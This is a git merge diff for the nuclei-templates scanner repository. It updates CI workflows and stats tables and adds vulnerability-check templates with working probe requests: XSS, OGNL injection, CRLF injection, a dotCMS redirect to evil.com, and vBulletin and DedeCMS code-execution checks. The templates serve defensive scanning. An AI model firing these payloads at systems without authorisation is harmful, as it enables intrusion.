Merge branch 'main' into patch-1
commit
0597e2bbd4
|
@ -15,12 +15,12 @@ jobs:
|
|||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
|
||||
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Setup CVE annotate
|
||||
if: steps.meta.outputs.tag != ''
|
||||
if: steps.meta.outputs.TAG != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.tag }}
|
||||
VERSION: ${{ steps.meta.outputs.TAG }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
|
||||
sudo unzip cve-annotate.zip -d /usr/local/bin
|
||||
|
@ -30,10 +30,10 @@ jobs:
|
|||
id: cve-annotate
|
||||
run: |
|
||||
cve-annotate -i . -d .
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.cve-annotate.outputs.changes > 0
|
||||
if: steps.cve-annotate.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
|
@ -42,7 +42,7 @@ jobs:
|
|||
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.cve-annotate.outputs.changes > 0
|
||||
if: steps.cve-annotate.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
|
|
@ -30,17 +30,17 @@ jobs:
|
|||
id: readme-update
|
||||
run: |
|
||||
python .github/scripts/update-readme.py
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.readme-update.outputs.changes > 0
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto README Update [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
if: steps.readme-update.outputs.changes > 0
|
||||
if: steps.readme-update.outputs.CHANGES > 0
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
|
|
@ -0,0 +1,38 @@
|
|||
name: 📝 Template Checksum
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.18
|
||||
|
||||
- name: install checksum generator
|
||||
run: |
|
||||
go install -v github.com/projectdiscovery/nuclei/v2/cmd/generate-checksum@dev
|
||||
|
||||
- name: generate checksum
|
||||
run: |
|
||||
generate-checksum /home/runner/work/nuclei-templates/nuclei-templates/ templates-checksum.txt
|
||||
|
||||
- name: Commit files
|
||||
run: |
|
||||
git pull
|
||||
git add templates-checksum.txt
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git commit -m "Auto Generated Templates Checksum [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: master
|
|
@ -14,7 +14,7 @@ jobs:
|
|||
with:
|
||||
go-version: 1.17
|
||||
|
||||
- name: Intalling Indexer
|
||||
- name: Installing Indexer
|
||||
run: |
|
||||
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||
|
|
|
@ -11,12 +11,12 @@ jobs:
|
|||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
|
||||
curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Setup Nuclei
|
||||
if: steps.meta.outputs.tag != ''
|
||||
if: steps.meta.outputs.TAG != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.tag }}
|
||||
VERSION: ${{ steps.meta.outputs.TAG }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
|
||||
sudo unzip nuclei*.zip -d /usr/local/bin
|
||||
|
|
|
@ -13,7 +13,7 @@ jobs:
|
|||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.17
|
||||
go-version: 1.18
|
||||
|
||||
- name: Installing Template Stats
|
||||
run: |
|
||||
|
@ -37,10 +37,10 @@ jobs:
|
|||
|
||||
- name: Get statistical changes
|
||||
id: stats
|
||||
run: echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
run: git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
|
||||
|
||||
- name: Commit files
|
||||
if: steps.stats.outputs.changes > 0
|
||||
if: steps.stats.outputs.CHANGES > 0
|
||||
run: |
|
||||
git add TEMPLATES-STATS.*
|
||||
git add TOP-10.md
|
||||
|
|
|
@ -1,32 +1,10 @@
|
|||
cves/2022/CVE-2022-22242.yaml
|
||||
default-logins/xnat-default-login.yaml
|
||||
exposed-panels/allied-telesis-exposure.yaml
|
||||
exposed-panels/ampache-panel.yaml
|
||||
exposed-panels/cisco/cisco-anyconnect-vpn.yaml
|
||||
exposed-panels/connectwise-backup-manager.yaml
|
||||
exposed-panels/gira-homeserver-homepage.yaml
|
||||
exposed-panels/hangfire-dashboard.yaml
|
||||
exposed-panels/nginx-admin-panel.yaml
|
||||
exposed-panels/nginx-ui-dashboard.yaml
|
||||
exposed-panels/nport-web-console.yaml
|
||||
exposed-panels/xnat-login.yaml
|
||||
misconfiguration/debug/ampache-debug.yaml
|
||||
misconfiguration/debug/flask-werkzeug-debug.yaml
|
||||
misconfiguration/debug/github-debug.yaml
|
||||
misconfiguration/global-traffic-statistics.yaml
|
||||
misconfiguration/healthchecks-ui-exposure.yaml
|
||||
misconfiguration/hfs-exposure.yaml
|
||||
misconfiguration/installer/ampache-music-installer.yaml
|
||||
misconfiguration/installer/moodle-installer.yaml
|
||||
misconfiguration/installer/sms-installer.yaml
|
||||
misconfiguration/questdb-console.yaml
|
||||
misconfiguration/qvidium-management-system-exposed.yaml
|
||||
misconfiguration/rekognition-image-validation.yaml
|
||||
misconfiguration/smarterstats-setup.yaml
|
||||
network/detection/axigen-mail-server-detect.yaml
|
||||
network/detection/riak-detect.yaml
|
||||
technologies/catalog-creator-detect.yaml
|
||||
technologies/coming-soon-page-detect.yaml
|
||||
technologies/google/cloud-run-default-page.yaml
|
||||
technologies/php-detect.yaml
|
||||
technologies/vivotex-web-console-detect.yaml
|
||||
cves/2022/CVE-2022-0786.yaml
|
||||
cves/2022/CVE-2022-25082.yaml
|
||||
exposed-panels/creatio-login-panel.yaml
|
||||
exposed-panels/posthog-admin-panel.yaml
|
||||
exposed-panels/webuzo-admin-panel.yaml
|
||||
exposed-panels/xfinity-panel.yaml
|
||||
iot/carel-plantvisor-panel.yaml
|
||||
iot/hue-personal-wireless-panel.yaml
|
||||
network/exposed-dockerd.yaml
|
||||
technologies/aws/amazon-ec2-detect.yaml
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1504 | dhiyaneshdk | 677 | cves | 1482 | info | 1579 | http | 4129 |
|
||||
| panel | 721 | daffainfo | 656 | exposed-panels | 727 | high | 1118 | file | 77 |
|
||||
| edb | 574 | pikpikcu | 338 | vulnerabilities | 518 | medium | 810 | network | 63 |
|
||||
| xss | 525 | pdteam | 273 | misconfiguration | 305 | critical | 532 | dns | 17 |
|
||||
| lfi | 517 | geeknik | 196 | technologies | 299 | low | 242 | | |
|
||||
| exposure | 487 | dwisiswant0 | 171 | exposures | 299 | unknown | 20 | | |
|
||||
| wordpress | 453 | 0x_akoko | 167 | token-spray | 235 | | | | |
|
||||
| cve2021 | 363 | pussycat0x | 151 | workflows | 190 | | | | |
|
||||
| wp-plugin | 348 | princechaddha | 151 | default-logins | 110 | | | | |
|
||||
| rce | 342 | ritikchaddha | 149 | file | 77 | | | | |
|
||||
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
|
||||
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
|
||||
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
|
||||
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
|
||||
|
||||
**306 directories, 4520 files**.
|
||||
**328 directories, 4791 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
4353
TEMPLATES-STATS.md
4353
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1504 | dhiyaneshdk | 677 | cves | 1482 | info | 1579 | http | 4129 |
|
||||
| panel | 721 | daffainfo | 656 | exposed-panels | 727 | high | 1118 | file | 77 |
|
||||
| edb | 574 | pikpikcu | 338 | vulnerabilities | 518 | medium | 810 | network | 63 |
|
||||
| xss | 525 | pdteam | 273 | misconfiguration | 305 | critical | 532 | dns | 17 |
|
||||
| lfi | 517 | geeknik | 196 | technologies | 299 | low | 242 | | |
|
||||
| exposure | 487 | dwisiswant0 | 171 | exposures | 299 | unknown | 20 | | |
|
||||
| wordpress | 453 | 0x_akoko | 167 | token-spray | 235 | | | | |
|
||||
| cve2021 | 363 | pussycat0x | 151 | workflows | 190 | | | | |
|
||||
| wp-plugin | 348 | princechaddha | 151 | default-logins | 110 | | | | |
|
||||
| rce | 342 | ritikchaddha | 149 | file | 77 | | | | |
|
||||
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
|
||||
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
|
||||
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
|
||||
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
|
||||
|
|
|
@ -1368,5 +1368,16 @@
|
|||
"website": "",
|
||||
"email": ""
|
||||
}
|
||||
},
|
||||
{
|
||||
"author": "heywoodlh",
|
||||
"links": {
|
||||
"github": "https://www.github.com/heywoodlh",
|
||||
"twitter": "",
|
||||
"linkedin": "",
|
||||
"website": "https://the-empire.systems",
|
||||
"email": ""
|
||||
}
|
||||
}
|
||||
|
||||
]
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2008-6465
|
||||
|
||||
info:
|
||||
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
|
||||
reference:
|
||||
- http://www.xssing.com/index.php?x=3&y=65
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2008-6465
|
||||
cwe-id: CWE-80
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Parallels H-Sphere
|
||||
tags: cve,cve2008,xss,parallels,h-sphere
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '\" onfocus=alert(document.domain); autofocus'
|
||||
- 'Please enter login name & password'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -13,10 +13,11 @@ info:
|
|||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2008-6982
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: devalcms,xss,cms,edb
|
||||
tags: cve,cve2008,devalcms,xss,cms,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2012-0394
|
||||
|
||||
info:
|
||||
name: Apache Struts Dev Mode OGNL Injection
|
||||
author: tess
|
||||
severity: critical
|
||||
description: |
|
||||
The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
|
||||
reference:
|
||||
- https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
|
||||
- https://www.exploit-db.com/exploits/31434
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
|
||||
- http://www.exploit-db.com/exploits/18329
|
||||
classification:
|
||||
cve-id: CVE-2012-0394
|
||||
metadata:
|
||||
shodan-query: html:"Struts Problem Report"
|
||||
verified: "true"
|
||||
tags: ognl,injection,edb,cve,cve2012,apache,struts
|
||||
|
||||
variables:
|
||||
first: "{{rand_int(1000, 9999)}}"
|
||||
second: "{{rand_int(1000, 9999)}}"
|
||||
result: "{{to_number(first)*to_number(second)}}"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '{{result}}'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2016-10033
|
||||
|
||||
info:
|
||||
name: WordPress PHPMailer < 5.2.18 Remote Code Execution
|
||||
name: WordPress PHPMailer < 5.2.18 - Remote Code Execution
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.
|
||||
|
|
|
@ -9,13 +9,17 @@ info:
|
|||
reference:
|
||||
- https://www.fortiguard.com/psirt/FG-IR-17-242
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
|
||||
- https://fortiguard.com/advisory/FG-IR-17-242
|
||||
- https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2017-14186
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: port:10443 http.favicon.hash:945408572
|
||||
verified: "true"
|
||||
tags: cve,cve2017,fortigate,xss,fortinet
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
|
@ -40,4 +40,4 @@ requests:
|
|||
- "SQLServer"
|
||||
condition: and
|
||||
|
||||
# Enhanced by cs on 2022/10/06
|
||||
# Enhanced by cs on 2022/10/24
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
reference:
|
||||
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-8917
|
||||
- http://www.securitytracker.com/id/1038522
|
||||
- https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2018-1000861
|
||||
cwe-id: CWE-502
|
||||
tags: kev,vulhub,cve,cve2018,jenkin,rce,jenkins
|
||||
tags: kev,vulhub,cve,cve2018,rce,jenkins
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-14912
|
||||
|
||||
info:
|
||||
name: cgit < 1.2.1 Directory Traversal
|
||||
name: cgit < 1.2.1 - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-17422
|
||||
|
||||
info:
|
||||
name: dotCMS <5.0.2 - Open Redirect
|
||||
name: DotCMS < 5.0.2 - Open Redirect
|
||||
author: 0x_Akoko,daffainfo
|
||||
severity: medium
|
||||
description: |
|
||||
|
@ -16,27 +16,22 @@ info:
|
|||
cve-id: CVE-2018-17422
|
||||
cwe-id: CWE-601
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"dotCMS"
|
||||
verified: "true"
|
||||
tags: cve,cve2018,redirect,dotcms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
|
||||
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
|
||||
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com'
|
||||
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "self.location = 'http://www.interact.sh'"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- "self.location = 'http://evil.com'"
|
||||
- "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
@ -78,4 +78,4 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/10/06
|
||||
# Enhanced by mp on 2022/10/07
|
||||
|
|
|
@ -19,7 +19,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}"
|
||||
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -27,9 +27,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "phpinfo"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
- "4cc32a3a81d2bb37271934a48ce4468a"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-10232
|
||||
|
||||
info:
|
||||
name: Teclib GLPI <= 9.3.3 Unauthenticated SQL Injection
|
||||
name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
|
||||
author: RedTeamBrasil
|
||||
severity: critical
|
||||
description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-12314
|
||||
|
||||
info:
|
||||
name: Deltek Maconomy 2.2.5 Local File Inclusion
|
||||
name: Deltek Maconomy 2.2.5 - Local File Inclusion
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-12725
|
||||
|
||||
info:
|
||||
name: Zeroshell 3.9.0 Remote Command Execution
|
||||
name: Zeroshell 3.9.0 - Remote Command Execution
|
||||
author: dwisiswant0,akincibor
|
||||
severity: critical
|
||||
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-13101
|
||||
|
||||
info:
|
||||
name: D-Link DIR-600M Authentication Bypass
|
||||
name: D-Link DIR-600M - Authentication Bypass
|
||||
author: Suman_Kar
|
||||
severity: critical
|
||||
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-13392
|
||||
|
||||
info:
|
||||
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
|
||||
name: MindPalette NateMail 3.0.15 - Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-15107
|
||||
|
||||
info:
|
||||
name: Webmin <= 1.920 Unauthenticated Remote Command Execution
|
||||
name: Webmin <= 1.920 - Unauthenticated Remote Command Execution
|
||||
author: bp0lr
|
||||
severity: critical
|
||||
description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-16313
|
||||
|
||||
info:
|
||||
name: ifw8 Router ROM v4.31 Credential Discovery
|
||||
name: ifw8 Router ROM v4.31 - Credential Discovery
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-16662
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.2 Remote Code Execution
|
||||
name: rConfig 3.9.2 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.
|
||||
|
|
|
@ -15,7 +15,10 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-16759
|
||||
cwe-id: CWE-94
|
||||
tags: rce,kev,seclists,cve,cve2019,vbulletin
|
||||
metadata:
|
||||
shodan-query: http.component:"vBulletin"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,rce,kev,seclists,vbulletin
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -24,15 +27,15 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
|
||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "addcc9f9f2f40e2e6aca3079b73d9d17"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Version"
|
||||
|
||||
# Enhanced by mp on 2022/03/29
|
||||
|
|
|
@ -12,9 +12,10 @@ info:
|
|||
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html
|
||||
- http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-2729
|
||||
cwe-id: CWE-284
|
||||
tags: cve,cve2019,oracle,rce,weblogic
|
||||
|
||||
requests:
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.tenable.com/security/research/tra-2019-03
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-3911
|
||||
cwe-id: CWE-79
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
- https://www.cvedetails.com/cve/CVE-2019-3912
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-3912
|
||||
cwe-id: CWE-601
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2019-6802
|
||||
|
||||
info:
|
||||
name: Pypiserver 1.2.5 - CRLF Injection
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI
|
||||
reference:
|
||||
- https://vuldb.com/?id.130257
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-6802
|
||||
- https://github.com/pypiserver/pypiserver/issues/237
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-6802
|
||||
cwe-id: CWE-79,CWE-74
|
||||
metadata:
|
||||
shodan-query: html:"pypiserver"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,crlf,generic,pypiserver
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'Set-Cookie: crlfinjection=1;'
|
|
